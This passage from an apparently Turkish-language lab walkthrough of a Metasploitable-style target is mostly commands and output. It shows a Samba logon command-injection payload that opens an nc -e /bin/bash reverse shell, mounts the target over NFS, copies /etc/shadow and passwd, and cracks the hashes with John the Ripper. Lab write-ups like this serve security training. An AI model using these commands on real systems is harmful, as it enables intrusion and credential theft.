Enter WORKGROUP\root’s password:
Anonymous login successful
Try “help” to get a list of possible commands.
smb: \> logon “./=`nohup nc 192.168.1.26 6666 -e /bin/bash`”
Password:
Listener’ın açık olduğu terminale geçiş yapıyorum ve içerde olduğumu görüyorum.
Bash’e zıplamak için aşağıdaki komutu kullanıyorum.
python -c ‘import pty; pty.spawn(“/bin/sh”)’
Bir zafiyet üzerinden daha hedefi ele geçirdik.
root@kali:~# mount -t nfs 192.168.1.21:/ /tmp/ceyhun
root@kali:~# cd /tmp/ceyhun/
root@kali:/tmp/ceyhun# ls -la
total 104
drwxr-xr-x 21 root root 4096 May 20 2012 .
drwxrwxrwt 21 root root 4096 Oct 31 16:53 ..
drwxr-xr-x 2 root root 4096 May 13 2012 bin
drwxr-xr-x 3 root root 4096 Apr 28 2010 boot
lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom
drwxr-xr-x 2 root root 4096 May 20 2012 dev
drwxr-xr-x 95 root root 4096 Oct 31 14:10 etc
drwxr-xr-x 6 root root 4096 Apr 16 2010 home
drwxr-xr-x 2 root root 4096 Mar 16 2010 initrd
lrwxrwxrwx 1 root root 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x 13 root root 4096 May 13 2012 lib
drwx—— 2 root root 16384 Mar 16 2010 lost+found
drwxr-xr-x 4 root root 4096 Mar 16 2010 media
drwxr-xr-x 3 root root 4096 Apr 28 2010 mnt
-rw——- 1 root root 7984 Oct 31 14:07 nohup.out
drwxr-xr-x 2 root root 4096 Mar 16 2010 opt
dr-xr-xr-x 2 root root 4096 Apr 28 2010 proc
drwxr-xr-x 13 root root 4096 Oct 31 14:07 root
drwxr-xr-x 2 root root 4096 May 13 2012 sbin
drwxr-xr-x 2 root root 4096 Mar 16 2010 srv
drwxr-xr-x 2 root root 4096 Apr 28 2010 sys
drwxrwxrwt 5 root root 4096 Oct 31 16:37 tmp
drwxr-xr-x 12 root root 4096 Apr 28 2010 usr
drwxr-xr-x 15 root root 4096 May 20 2012 var
lrwxrwxrwx 1 root root 29 Apr 28 2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
root@kali:/tmp/ceyhun# cp /tmp/ceyhun/etc/shadow /tmp/passwd-shadow-merged/
root@kali:/tmp/ceyhun# cp /tmp/ceyhun/etc/passwd /tmp/passwd-shadow-merged/
root@kali:/tmp/ceyhun# cd ../passwd-shadow-merged/
root@kali:/tmp/passwd-shadow-merged# unshadow passwd shadow > merged
root@kali:/tmp/passwd-shadow-merged# john merged
Warning: detected hash type “md5crypt”, but the string is also recognized as “md5crypt-long”
Use the “–format=md5crypt-long” option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 7 password hashes with 7 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8×3])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press ‘q’ or Ctrl-C to abort, almost any other key for status
user (user)
postgres (postgres)
Warning: Only 20 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 32 candidates buffered for the current salt, minimum 48 needed for performance.
msfadmin (msfadmin)
Warning: Only 21 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 33 candidates buffered for the current salt, minimum 48 needed for performance.
service (service)
Warning: Only 30 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 37 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 38 candidates buffered for the current salt, minimum 48 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 20 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 21 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 10 candidates buffered for the current salt, minimum 48 needed for performance.
Further messages of this type will be suppressed.
To see less of these warnings, enable ‘RelaxKPCWarningCheck’ in john.conf
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
123456789 (klog)
batman (sys)
Proceeding with incremental:ASCII